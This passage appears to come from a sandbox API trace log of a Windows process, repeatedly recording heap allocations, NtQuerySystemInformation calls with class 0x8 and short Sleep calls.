RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0294.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0294.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0294.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0294.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0294.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0294.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.926] Sleep (dwMilliseconds=0x110) [0294.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0294.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0294.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0294.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0294.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0294.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0294.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0294.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0294.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.942] Sleep (dwMilliseconds=0x110) [0294.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0294.950] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0294.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0294.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0294.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0294.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0294.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0294.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0294.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.957] Sleep (dwMilliseconds=0x110) [0294.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0294.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0294.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0294.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0294.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0294.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0294.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0294.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0294.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.973] Sleep (dwMilliseconds=0x110) [0294.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0294.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0294.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0294.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0294.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0294.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0294.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0294.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0294.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0294.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0294.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0294.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0294.989] Sleep (dwMilliseconds=0x110) [0295.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0295.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0295.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0295.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0295.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0295.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0295.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0295.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0295.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.004] Sleep (dwMilliseconds=0x110) [0295.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0295.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0295.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0295.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0295.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0295.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0295.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0295.051] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.052] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0295.056] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.056] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.056] Sleep (dwMilliseconds=0x110) [0295.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0295.115] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.116] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0295.116] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0295.116] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.117] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0295.117] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0295.117] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.118] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0295.135] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0295.135] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.136] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0295.136] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.136] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.136] Sleep (dwMilliseconds=0x110) [0295.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0295.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0295.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0295.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0295.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0295.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0295.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0295.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0295.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.159] Sleep (dwMilliseconds=0x110) [0295.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0295.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0295.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0295.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0295.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0295.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0295.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0295.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0295.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.176] Sleep (dwMilliseconds=0x110) [0295.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0295.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0295.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0295.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0295.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0295.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0295.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0295.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0295.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.192] Sleep (dwMilliseconds=0x110) [0295.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0295.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0295.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0295.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0295.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0295.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0295.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0295.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0295.206] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.206] Sleep (dwMilliseconds=0x110) [0295.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0295.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.248] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0295.248] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0295.248] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0295.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0295.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0295.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0295.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0295.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.251] Sleep (dwMilliseconds=0x110) [0295.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0295.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0295.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0295.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0295.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0295.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0295.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0295.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0295.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0295.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0295.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0295.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0295.271] Sleep (dwMilliseconds=0x110) [0295.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0295.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, 